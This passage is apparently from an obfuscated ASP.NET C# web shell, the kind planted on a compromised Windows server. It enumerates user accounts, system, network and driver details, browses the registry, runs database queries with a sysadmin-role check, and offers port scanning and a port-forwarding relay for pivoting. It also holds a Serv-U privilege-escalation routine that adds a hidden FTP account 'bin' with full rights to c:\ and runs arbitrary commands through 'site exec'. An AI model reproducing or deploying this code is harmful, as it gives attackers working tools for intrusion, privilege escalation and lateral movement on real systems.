  965. tr.Controls.Add(td);
  966. }
  967. }
  968. vHCs.Controls.Add(tr);
  969. }
  970. }
  971. catch(Exception error)
  972. {
  973. oHpF();
  974. }
  975. }
  976. public void PLd()
  977. {
  978. try
  979. {
  980. WICxe();
  981. xWVQ.Visible=true;
  982. Bin_H2_Title.InnerText="User Information >>";
  983. DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
  984. foreach(DirectoryEntry child in TWQ.Children)
  985. {
  986. foreach(string name in child.Properties.PropertyNames)
  987. {
  988. PropertyValueCollection pvc=child.Properties[name];
  989. int c=pvc.Count;
  990. for(int i=0;i<c;i++)
  991. {
  992. if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
  993. {
  994. string bg=OKM();
  995. TableRow tr=new TableRow();
  996. tr.Attributes["onmouseover"]="this.className='focus';";
  997. tr.CssClass=bg;
  998. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  999. TableCell td=new TableCell();
  1000. td.Text=name;
  1001. tr.Controls.Add(td);
  1002. TableCell td1=new TableCell();
  1003. td1.Text=pvc[i].ToString();
  1004. tr.Controls.Add(td1);
  1005. VPa.Controls.Add(tr);
  1006. }
  1007. }
  1008. }
  1009. TableRow trn=new TableRow();
  1010. for(int x=1;x<3;x++)
  1011. {
  1012. TableCell tdn=new TableCell();
  1013. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
  1014. trn.Controls.Add(tdn);
  1015. VPa.Controls.Add(trn);
  1016. }
  1017. }
  1018. }
  1019. catch(Exception error)
  1020. {
  1021. xseuB(error.Message);
  1022. }
  1023. }
  1024. public void iLVUT()
  1025. {
  1026. try
  1027. {
  1028. WICxe();
  1029. xWVQ.Visible=true;
  1030. Bin_H2_Title.InnerText="User Information >>";
  1031. DataTable user=cCf("Win32_UserAccount");
  1032. for(int i=0;i<user.Rows.Count;i++)
  1033. {
  1034. for(int j=0;j<user.Columns.Count;j++)
  1035. {
  1036. string bg=OKM();
  1037. TableRow tr=new TableRow();
  1038. tr.Attributes["onmouseover"]="this.className='focus';";
  1039. tr.CssClass=bg;
  1040. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1041. TableCell td=new TableCell();
  1042. td.Text=user.Columns[j].ToString();
  1043. tr.Controls.Add(td);
  1044. TableCell td1=new TableCell();
  1045. td1.Text=user.Rows[i][j].ToString();
  1046. tr.Controls.Add(td1);
  1047. VPa.Controls.Add(tr);
  1048. }
  1049. TableRow trn=new TableRow();
  1050. for(int x=1;x<3;x++)
  1051. {
  1052. TableCell tdn=new TableCell();
  1053. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
  1054. trn.Controls.Add(tdn);
  1055. VPa.Controls.Add(trn);
  1056. }
  1057. }
  1058. }
  1059. catch(Exception error)
  1060. {
  1061. PLd();
  1062. }
  1063. }
  1064. public void pDVM()
  1065. {
  1066. try
  1067. {
  1068. RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
  1069. string IKjwH=DdmPl(EeZ,"PortNumber");
  1070. RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
  1071. int cpu=izN.SubKeyCount;
  1072. RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
  1073. string NPPZ=DdmPl(mQII,"ProcessorNameString");
  1074. WICxe();
  1075. ghaB.Visible=true;
  1076. Bin_H2_Title.InnerText="System Information >>";
  1077. Bin_H2_Mac.InnerText="MAC Information >>";
  1078. Bin_H2_Driver.InnerText="Driver Information >>";
  1079. StringBuilder yEwc=new StringBuilder();
  1080. StringBuilder hwJeS=new StringBuilder();
  1081. StringBuilder jXkaE=new StringBuilder();
  1082. yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
  1083. yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
  1084. yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
  1085. yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
  1086. yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
  1087. yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
  1088. yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
  1089. yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
  1090. DataTable BIOS=cCf("Win32_BIOS");
  1091. yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
  1092. yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
  1093. yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
  1094. DataTable upM=cCf("Win32_PhysicalMemory");
  1095. Int64 oZnZV=0;
  1096. for(int i=0;i<upM.Rows.Count;i++)
  1097. {
  1098. oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
  1099. }
  1100. yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
  1101. DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
  1102. for(int i=0;i<dOza.Rows.Count;i++)
  1103. {
  1104. hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
  1105. if(dOza.Rows[i]["MACAddress"]!=string.Empty)
  1106. {
  1107. hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
  1108. }
  1109. }
  1110. DataTable Driver=cCf("Win32_SystemDriver");
  1111. for (int i=0; i<Driver.Rows.Count; i++)
  1112. {
  1113. jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
  1114. if (Driver.Rows[i]["PathName"]!=string.Empty)
  1115. {
  1116. jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
  1117. }
  1118. else
  1119. {
  1120. jXkaE.Append("No path information");
  1121. }
  1122. jXkaE.Append("</li>");
  1123. }
  1124. Bin_Ul_Sys.InnerHtml=yEwc.ToString();
  1125. Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
  1126. Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
  1127. }
  1128. catch(Exception error)
  1129. {
  1130. xseuB(error.Message);
  1131. }
  1132. }
  1133. public void ADCpk()
  1134. {
  1135. WICxe();
  1136. APl.Visible=true;
  1137. Bin_H2_Title.InnerText="Serv-U Exec >>";
  1138. }
  1139. public void lDODR()
  1140. {
  1141. string JGGg=string.Empty;
  1142. string user=dNohJ.Value;
  1143. string pass=NMd.Value;
  1144. int port=Int32.Parse(HlQl.Value);
  1145. string cmd=mHbjB.Value;
  1146. string CRtK="user "+user+"\r\n";
  1147. string jnNG="pass "+pass+"\r\n";
  1148. string site="SITE MAINTENANCE\r\n";
  1149. string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
  1150. string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
  1151. string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
  1152. string zexn="QUIT\r\n";
  1153. UHlA.Visible=true;
  1154. try
  1155. {
  1156. tcp.Connect("127.0.0.1",port);
  1157. tcp.ReceiveBufferSize=1024;
  1158. NS=tcp.GetStream();
  1159. Rev(NS);
  1160. ZJiM(NS,CRtK);
  1161. Rev(NS);
  1162. ZJiM(NS,jnNG);
  1163. Rev(NS);
  1164. ZJiM(NS,site);
  1165. Rev(NS);
  1166. ZJiM(NS,mtoJb);
  1167. Rev(NS);
  1168. ZJiM(NS,sutI);
  1169. Rev(NS);
  1170. ZJiM(NS,iVDT);
  1171. Rev(NS);
  1172. Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
  1173. zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
  1174. NS1=zvxm.GetStream();
  1175. Rev(NS1);
  1176. ZJiM(NS1,"user bin\r\n");
  1177. Rev(NS1);
  1178. ZJiM(NS1,"pass binftp\r\n");
  1179. Rev(NS1);
  1180. ZJiM(NS1,"site exec "+cmd+"\r\n");
  1181. Rev(NS1);
  1182. ZJiM(NS1,"quit\r\n");
  1183. Rev(NS1);
  1184. zvxm.Close();
  1185. ZJiM(NS,mtoJb);
  1186. Rev(NS);
  1187. tcp.Close();
  1188. }
  1189. catch(Exception error)
  1190. {
  1191. xseuB(error.Message);
  1192. }
  1193. }
  1194. protected void Rev(NetworkStream instream)
  1195. {
  1196. string FTBtf=string.Empty;
  1197. if(instream.CanRead)
  1198. {
  1199. byte[] uPZ=new byte[1024];
  1200. do
  1201. {
  1202. System.Threading.Thread.Sleep(50);
  1203. int len=instream.Read(uPZ,0,uPZ.Length);
  1204. FTBtf+=Encoding.Default.GetString(uPZ,0,len);
  1205. }
  1206. while(instream.DataAvailable);
  1207. }
  1208. Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
  1209. }
  1210. protected void ZJiM(NetworkStream instream,string Sendstr)
  1211. {
  1212. if(instream.CanWrite)
  1213. {
  1214. byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
  1215. instream.Write(uPZ,0,uPZ.Length);
  1216. }
  1217. Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
  1218. }
  1219. public void xFhz()
  1220. {
  1221. WICxe();
  1222. kkHN.Visible=true;
  1223. Bin_H2_Title.InnerText="RegShell >>";
  1224. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
  1225. vyX.Text="";
  1226. foreach(string rootkey in txc.Split('|'))
  1227. {
  1228. vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
  1229. }
  1230. lFAvw();
  1231. }
  1232. protected void lFAvw()
  1233. {
  1234. qPdI.Text="";
  1235. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
  1236. TableRow tr;
  1237. TableCell tc;
  1238. foreach(string rootkey in txc.Split('|'))
  1239. {
  1240. tr=new TableRow();
  1241. tc=new TableCell();
  1242. string bg=OKM();
  1243. tr.Attributes["onmouseover"]="this.className='focus';";
  1244. tr.CssClass=bg;
  1245. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1246. tc.Width=Unit.Parse("40%");
  1247. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
  1248. tr.Cells.Add(tc);
  1249. tc=new TableCell();
  1250. tc.Width=Unit.Parse("60%");
  1251. tc.Text="&lt;RootKey&gt;";
  1252. tr.Cells.Add(tc);
  1253. pLWD.Rows.Add(tr);
  1254. }
  1255. }
  1256. protected void tpRQ(string Reg_Path)
  1257. {
  1258. if(!Reg_Path.EndsWith("\\"))
  1259. {
  1260. Reg_Path=Reg_Path+"\\";
  1261. }
  1262. qPdI.Text=Reg_Path;
  1263. string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
  1264. cJG=Regex.Replace(cJG,@"\\+","\\");
  1265. TableRow tr=new TableRow();
  1266. TableCell tc=new TableCell();
  1267. string bg=OKM();
  1268. tr.Attributes["onmouseover"]="this.className='focus';";
  1269. tr.CssClass=bg;
  1270. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1271. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
  1272. tc.Attributes["colspan"]="2" ;
  1273. tr.Cells.Add(tc);
  1274. pLWD.Rows.Add(tr);
  1275. try
  1276. {
  1277. string subpath;
  1278. string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
  1279. RegistryKey rk=null;
  1280. RegistryKey sk;
  1281. if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
  1282. {
  1283. rk=Registry.LocalMachine;
  1284. }
  1285. else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
  1286. {
  1287. rk=Registry.ClassesRoot;
  1288. }
  1289. else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
  1290. {
  1291. rk=Registry.CurrentUser;
  1292. }
  1293. else if(Reg_Path.StartsWith("HKEY_USERS"))
  1294. {
  1295. rk=Registry.Users;
  1296. }
  1297. else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
  1298. {
  1299. rk=Registry.CurrentConfig;
  1300. }
  1301. if(kDgkX.Length>1)
  1302. {
  1303. sk=rk.OpenSubKey(kDgkX);
  1304. }
  1305. else
  1306. {
  1307. sk=rk;
  1308. }
  1309. foreach(string innerSubKey in sk.GetSubKeyNames())
  1310. {
  1311. tr=new TableRow();
  1312. tc=new TableCell();
  1313. bg=OKM();
  1314. tr.Attributes["onmouseover"]="this.className='focus';";
  1315. tr.CssClass=bg;
  1316. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1317. tc.Width=Unit.Parse("40%");
  1318. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
  1319. tr.Cells.Add(tc);
  1320. tc=new TableCell();
  1321. tc.Width=Unit.Parse("60%");
  1322. tc.Text="&lt;SubKey&gt;";
  1323. tr.Cells.Add(tc);
  1324. pLWD.Rows.Add(tr);
  1325. }
  1326. TableRow cKVA=new TableRow();
  1327. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
  1328. cKVA.Attributes["bgcolor"]="#dddddd";
  1329. TableCell JlmW=new TableCell();
  1330. JlmW.Attributes["colspan"]="2" ;
  1331. JlmW.Attributes["height"]="5";
  1332. cKVA.Cells.Add(JlmW);
  1333. pLWD.Rows.Add(cKVA);
  1334. foreach(string strValueName in sk.GetValueNames())
  1335. {
  1336. tr=new TableRow();
  1337. tc=new TableCell();
  1338. bg=OKM();
  1339. tr.Attributes["onmouseover"]="this.className='focus';";
  1340. tr.CssClass=bg;
  1341. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1342. tc.Width=Unit.Parse("40%");
  1343. tc.Text=strValueName;
  1344. tr.Cells.Add(tc);
  1345. tc=new TableCell();
  1346. tc.Width=Unit.Parse("60%");
  1347. tc.Text=DdmPl(sk,strValueName);
  1348. tr.Cells.Add(tc);
  1349. pLWD.Rows.Add(tr);
  1350. }
  1351. }
  1352. catch(Exception error)
  1353. {
  1354. xseuB(error.Message);
  1355. }
  1356. }
  1357. public string DdmPl(RegistryKey sk,string strValueName)
  1358. {
  1359. object uPZ;
  1360. string RaTGr="";
  1361. try
  1362. {
  1363. uPZ=sk.GetValue(strValueName,"NULL");
  1364. if(uPZ.GetType()==typeof(byte[]))
  1365. {
  1366. foreach(byte tmpbyte in(byte[])uPZ)
  1367. {
  1368. if((int)tmpbyte<16)
  1369. {
  1370. RaTGr+="0";
  1371. }
  1372. RaTGr+=tmpbyte.ToString("X");
  1373. }
  1374. }
  1375. else if(uPZ.GetType()==typeof(string[]))
  1376. {
  1377. foreach(string tmpstr in(string[])uPZ)
  1378. {
  1379. RaTGr+=tmpstr;
  1380. }
  1381. }
  1382. else
  1383. {
  1384. RaTGr=uPZ.ToString();
  1385. }
  1386. }
  1387. catch(Exception error)
  1388. {
  1389. xseuB(error.Message);
  1390. }
  1391. return RaTGr;
  1392. }
  1393. public void vNCHZ()
  1394. {
  1395. WICxe();
  1396. YwLB.Visible=true;
  1397. Bin_H2_Title.InnerText="PortScan >>";
  1398. }
  1399. public void rAhe()
  1400. {
  1401. WICxe();
  1402. iDgmL.Visible=true;
  1403. dQIIF.Visible=false;
  1404. Bin_H2_Title.InnerText="DataBase >>";
  1405. }
  1406. protected void OUj()
  1407. {
  1408. if(Dtdr.State==ConnectionState.Closed)
  1409. {
  1410. try
  1411. {
  1412. Dtdr.ConnectionString=MasR.Text;
  1413. Kkvb.Connection=Dtdr;
  1414. Dtdr.Open();
  1415. }
  1416. catch(Exception Error)
  1417. {
  1418. xseuB(Error.Message);
  1419. }
  1420. }
  1421. }
  1422. protected void fUzE()
  1423. {
  1424. if(Dtdr.State==ConnectionState.Open)
  1425. Dtdr.Close();
  1426. Dtdr.Dispose();
  1427. Kkvb.Dispose();
  1428. }
  1429. public DataTable CYUe(string sqlstr)
  1430. {
  1431. OleDbDataAdapter da=new OleDbDataAdapter();
  1432. DataTable Dstog=new DataTable();
  1433. try
  1434. {
  1435. OUj();
  1436. Kkvb.CommandType=CommandType.Text;
  1437. Kkvb.CommandText=sqlstr;
  1438. da.SelectCommand=Kkvb;
  1439. da.Fill(Dstog);
  1440. }
  1441. catch(Exception)
  1442. {
  1443. }
  1444. finally
  1445. {
  1446. fUzE();
  1447. }
  1448. return Dstog;
  1449. }
  1450. public DataTable[] Bin_Data(string query)
  1451. {
  1452. ArrayList list=new ArrayList();
  1453. try
  1454. {
  1455. string str;
  1456. OUj();
  1457. query=query+"\r\n";
  1458. MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
  1459. int EmRX=0;
  1460. for(int i=0;i<gcod.Count;i++)
  1461. {
  1462. Match FJD=gcod[i];
  1463. str=query.Substring(EmRX,FJD.Index-EmRX);
  1464. if(str.Trim().Length>0)
  1465. {
  1466. OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
  1467. Kkvb.CommandType=CommandType.Text;
  1468. Kkvb.CommandText=str.Trim();
  1469. FgzeQ.SelectCommand=Kkvb;
  1470. DataSet cDPp=new DataSet();
  1471. FgzeQ.Fill(cDPp);
  1472. for(int j=0;j<cDPp.Tables.Count;j++)
  1473. {
  1474. list.Add(cDPp.Tables[j]);
  1475. }
  1476. }
  1477. EmRX=FJD.Index+3;
  1478. }
  1479. str=query.Substring(EmRX,query.Length-EmRX);
  1480. if(str.Trim().Length>0)
  1481. {
  1482. OleDbDataAdapter VwB=new OleDbDataAdapter();
  1483. Kkvb.CommandType=CommandType.Text;
  1484. Kkvb.CommandText=str.Trim();
  1485. VwB.SelectCommand=Kkvb;
  1486. DataSet arG=new DataSet();
  1487. VwB.Fill(arG);
  1488. for(int k=0;k<arG.Tables.Count;k++)
  1489. {
  1490. list.Add(arG.Tables[k]);
  1491. }
  1492. }
  1493. }
  1494. catch(SqlException e)
  1495. {
  1496. xseuB(e.Message);
  1497. rom.Visible=false;
  1498. }
  1499. return(DataTable[])list.ToArray(typeof(DataTable));
  1500. }
  1501. public void JIAKU(string instr)
  1502. {
  1503. try
  1504. {
  1505. OUj();
  1506. Kkvb.CommandType=CommandType.Text;
  1507. Kkvb.CommandText=instr;
  1508. Kkvb.ExecuteNonQuery();
  1509. }
  1510. catch(Exception e)
  1511. {
  1512. xseuB(e.Message);
  1513. }
  1514. }
  1515. public void dwgT()
  1516. {
  1517. try
  1518. {
  1519. OUj();
  1520. if(WYmo.SelectedItem.Text=="MSSQL")
  1521. {
  1522. if(Pvf.SelectedItem.Value!="")
  1523. {
  1524. Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
  1525. }
  1526. }
  1527. DataTable[] jxF=null;
  1528. jxF=Bin_Data(jHIy.InnerText);
  1529. if(jxF!=null && jxF.Length>0)
  1530. {
  1531. for(int j=0;j<jxF.Length;j++)
  1532. {
  1533. rom.PreRender+=new EventHandler(lRavM);
  1534. rom.DataSource=jxF[j];
  1535. rom.DataBind();
  1536. for(int i=0;i<rom.Items.Count;i++)
  1537. {
  1538. string bg=OKM();
  1539. rom.Items[i].CssClass=bg;
  1540. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
  1541. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
  1542. }
  1543. }
  1544. }
  1545. else
  1546. {
  1547. rom.DataSource=null;
  1548. rom.DataBind();
  1549. }
  1550. rom.Visible=true;
  1551. }
  1552. catch(Exception e)
  1553. {
  1554. xseuB(e.Message);
  1555. rom.Visible=false;
  1556. }
  1557. }
  1558. public void xTZY()
  1559. {
  1560. try
  1561. {
  1562. if(WYmo.SelectedItem.Text=="MSSQL")
  1563. {
  1564. if(Pvf.SelectedItem.Value=="")
  1565. {
  1566. rom.DataSource=null;
  1567. rom.DataBind();
  1568. return;
  1569. }
  1570. }
  1571. OUj();
  1572. DataTable zKvOw=new DataTable();
  1573. DataTable jxF=new DataTable();
  1574. DataTable baVJV=new DataTable();
  1575. if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
  1576. {
  1577. Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
  1578. }
  1579. zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
  1580. jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
  1581. foreach(DataRow dr in zKvOw.Rows)
  1582. {
  1583. jxF.ImportRow(dr);
  1584. }
  1585. jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
  1586. rom.PreRender+=new EventHandler(lRavM);
  1587. rom.DataSource=jxF;
  1588. rom.DataBind();
  1589. for(int i=0;i<rom.Items.Count;i++)
  1590. {
  1591. string bg=OKM();
  1592. rom.Items[i].CssClass=bg;
  1593. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
  1594. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
  1595. }
  1596. rom.Visible=true;
  1597. }
  1598. catch(Exception e)
  1599. {
  1600. xseuB(e.Message);
  1601. rom.Visible=false;
  1602. }
  1603. }
  1604. private void lRavM(object sender,EventArgs e)
  1605. {
  1606. DataGrid d=(DataGrid)sender;
  1607. foreach(DataGridItem item in d.Items)
  1608. {
  1609. foreach(TableCell t in item.Cells)
  1610. {
  1611. t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
  1612. }
  1613. }
  1614. }
  1615. public void vCf()
  1616. {
  1617. dQIIF.Visible=true;
  1618. try
  1619. {
  1620. jHIy.InnerHtml=string.Empty;
  1621. if(WYmo.SelectedItem.Text=="MSSQL")
  1622. {
  1623. rom.Visible=false;
  1624. uXevN.Visible=true;
  1625. irTU.Visible=true;
  1626. OUj();
  1627. DataTable ver=CYUe(@"SELECT @@VERSION");
  1628. DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
  1629. DataTable cdb=CYUe(@"SELECT DB_NAME()");
  1630. DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
  1631. DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
  1632. string jHlh=ver.Rows[0][0].ToString();
  1633. string dbo=string.Empty;
  1634. if(YKrm.Rows[0][0].ToString()=="1")
  1635. {
  1636. dbo="db_owner";
  1637. }
  1638. else
  1639. {
  1640. dbo="public";
  1641. }
  1642. if(rol.Rows[0][0].ToString()=="1")
  1643. {
  1644. dbo="<font color=blue>sa</font>";
  1645. }
  1646. string db_name=string.Empty;
  1647. foreach(ListItem item in FGEy.Items)
  1648. {
  1649.  if(item.Selected=true)
  1650.  {
  1651.  item.Selected=false;
  1652.  }
  1653. }
  1654. Pvf.Items.Clear();
  1655. Pvf.Items.Add("-- Select a DataBase --");
  1656. Pvf.Items[0].Value="";
  1657. for(int i=0;i<dbs.Rows.Count;i++)
  1658. {
  1659. db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
  1660. Pvf.Items.Add(dbs.Rows[i][0].ToString());
  1661. }
  1662. irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
  1663. }
  1664. else
  1665. {
  1666. uXevN.Visible=false;
  1667. irTU.Visible=false;
  1668. xTZY();
  1669. }
  1670. }
  1671. catch(Exception e)
  1672. {
  1673. dQIIF.Visible=false;
  1674. }
  1675. }
  1676. public void MHLv()
  1677. {
  1678. WICxe();
  1679. hOWTm.Visible=true;
  1680. Bin_H2_Title.InnerText="PortMap >>";
  1681. }
  1682. public class PortForward
  1683. {
  1684. public string Localaddress;
  1685. public int LocalPort;
  1686. public string RemoteAddress;
  1687. public int RemotePort;
  1688. string type;
  1689. Socket ltcpClient;
  1690. Socket rtcpClient;
  1691. Socket server;
  1692. byte[] DPrPL=new byte[2048];
  1693. byte[] wvZv=new byte[2048];
  1694. public struct session
  1695. {
  1696. public Socket rdel;
  1697. public Socket ldel;
  1698. public int llen;
  1699. public int rlen;
  1700. }
  1701. public static IPEndPoint mtJ(string host,int port)
  1702. {
  1703. IPEndPoint iep=null;
  1704. IPHostEntry aGN=Dns.Resolve(host);
  1705. IPAddress rmt=aGN.AddressList[0];
  1706. iep=new IPEndPoint(rmt,port);
  1707. return iep;
  1708. }
  1709. public void Start(string Rip,int Rport,string lip,int lport)
  1710. {
  1711. try
  1712. {
  1713. LocalPort=lport;
  1714. RemoteAddress=Rip;
  1715. RemotePort=Rport;
  1716. Localaddress=lip;
  1717. rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
  1718. ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
  1719. rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
  1720. }
  1721. catch (Exception ex) { }
  1722. }
  1723. protected void iiGFO(IAsyncResult ar)
  1724. {
  1725. try
  1726. {
  1727. session RKXy=new session();
  1728. RKXy.ldel=ltcpClient;
  1729. RKXy.rdel=rtcpClient;
  1730. ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
  1731. }
  1732. catch (Exception ex) { }
  1733. }
  1734. protected void VTp(IAsyncResult ar)
  1735. {
  1736. try
  1737. {
  1738. session RKXy=(session)ar.AsyncState;
  1739. ltcpClient.EndConnect(ar);
  1740. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
  1741. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
  1742. }
  1743. catch (Exception ex) { }
  1744. }
  1745. private void LFYM(IAsyncResult ar)
  1746. {
  1747. try
  1748. {
  1749. session RKXy=(session)ar.AsyncState;
  1750. int Ret=RKXy.rdel.EndReceive(ar);
  1751. if (Ret>0)
  1752. ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
  1753. else lyTOK();
  1754. }
  1755. catch (Exception ex) { }
  1756. }
  1757. private void JTcp(IAsyncResult ar)
  1758. {
  1759. try
  1760. {
  1761. session RKXy=(session)ar.AsyncState;
  1762. RKXy.ldel.EndSend(ar);
  1763. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
  1764. }
  1765. catch (Exception ex) { }
  1766. }
  1767. private void xPS(IAsyncResult ar)
  1768. {
  1769. try
  1770. {
  1771. session RKXy=(session)ar.AsyncState;
  1772. int Ret=RKXy.ldel.EndReceive(ar);
  1773. if (Ret>0)
  1774. RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
  1775. else lyTOK();
  1776. }
  1777. catch (Exception ex) { }
  1778. }
  1779. private void IZU(IAsyncResult ar)
  1780. {
  1781. try
  1782. {
  1783. session RKXy=(session)ar.AsyncState;
  1784. RKXy.rdel.EndSend(ar);
  1785. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
  1786. }
  1787. catch (Exception ex) { }
  1788. }
  1789. public void lyTOK()
  1790. {
  1791. try
  1792. {
  1793. if (ltcpClient!=null)
  1794. {
  1795. ltcpClient.Close();
  1796. }
  1797. if (rtcpClient!=null)
  1798. rtcpClient.Close();
  1799. }
  1800. catch (Exception ex) { }
  1801. }
  1802. }
  1803. protected void vuou()
  1804. {
